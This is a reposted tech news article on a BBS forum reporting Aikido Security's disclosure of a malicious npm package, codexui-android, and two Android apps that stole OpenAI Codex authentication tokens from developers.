1. Forum
  2. tqwNet
  3. TQW GENTECH

  • OpenAI Codex tool with over 29,000 downloads linked to malicious

    From TechnologyDaily@1337:1/100 to All on Monday, June 01, 2026 20:15:25
    OpenAI Codex tool with over 29,000 downloads linked to malicious npm supply chain attack stealing authentication tokens

    Date:
    Mon, 01 Jun 2026 19:05:00 +0000

    Description:
    A tool started benign and turned sour after a little while, stealing tokens and granting persistent access.

    FULL STORY ======================================================================Copy link Facebook X Whatsapp Reddit Pinterest Flipboard Threads Email Share this article 0 Join the conversation Follow us Add us as a preferred source on Google Newsletter Subscribe to our newsletter Researchers uncovered a malicious npm package posing as a Codex UI tool Attackers exfiltrated Codex authentication tokens, including nonexpiring refresh tokens Aikido Security also found two Android apps targeting Codex users A newly discovered supply-chain attack on npm is targeting software developers using OpenAI Codex.

    Codex is OpenAIs coding assistant and software engineering agent that can write and review code, fix bugs, run tests, and help developers build
    software with nothing but plain language input. Recently it was discovered that a tool published on both GitHub and npm was actually malicious. It is called codexui-android, and it is described as a remote web user interface
    for the Codex platform. It attracted more than 29,000 weekly downloads, so it was rather popular. One of the reasons for its popularity is because it
    worked as advertised and appeared legitimate. The code published on GitHub remained clean the whole time, meaning the public source code didnt show any malicious behavior. Latest Videos From Watch full video here: You may like Hackers can steal your GitHub tokens through OpenAIs Codex Mini Shai-Halud hackers publish over 600 compromised npm packages Security experts discover critical flaw in OpenAI's Codex able to compromise entire organizations Breaking bad However, approximately a month into its existence, the tool received an update on npm which added information-stealing code. It primarily hunted for OpenAI login credentials.

    When a developer runs the tool, it looks for their Codex authentication
    tokens and exfiltrates them to an attacker-controlled server. One of the tokens (the refresh token) can potentially allow an attacker to continue accessing the victims OpenAI account for an extended period of time without needing the password.

    The implications are rather dangerous, explained Aikido Security researcher Charlie Eriksen, who found and disclosed the attack. Besides the obvious - accessing the victims Codex sessions - the attacker can use the tokens to spend the victims API credits, to view projects or code theyre working on through Codex, and even impersonate the victim when interacting with OpenAI services.

    "The refresh_token doesn't expire," Eriksen said. "An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface -- it's persistent, silent access to whatever that account can do." Are you a pro? Subscribe to our newsletter
    Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed! Contact me with news
    and offers from other Future brands Receive email from us on behalf of our trusted partners or sponsors By submitting your information you agree to the Terms & Conditions and Privacy Policy and are aged 16 or over.

    Aikido also said it saw two Android apps, both published by the same account, who were also targeting Codex users. One is called OpenClaw Codex Claude AI Agent, running the npm package within its PRoot sandbox and sending all Codex credentials to the same, attacker-controlled server. This one had more than 50,000 downloads. The other one is called Codex and counts more than 10,000 downloads.

    Via The Hacker News The best antivirus for all budgets Our top picks, based on real-world testing and comparisons

    Read our full guide to the best antivirus 1. Best overall: Bitdefender Total Security 2. Best for families: Norton 360 with LifeLock 3. Best for mobile: McAfee Mobile Security Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds.



    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/openai-codex-tool-with-over-29-000-down loads-linked-to-malicious-npm-supply-chain-attack-stealing-authentication-toke ns


    --- Mystic BBS v1.12 A49 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)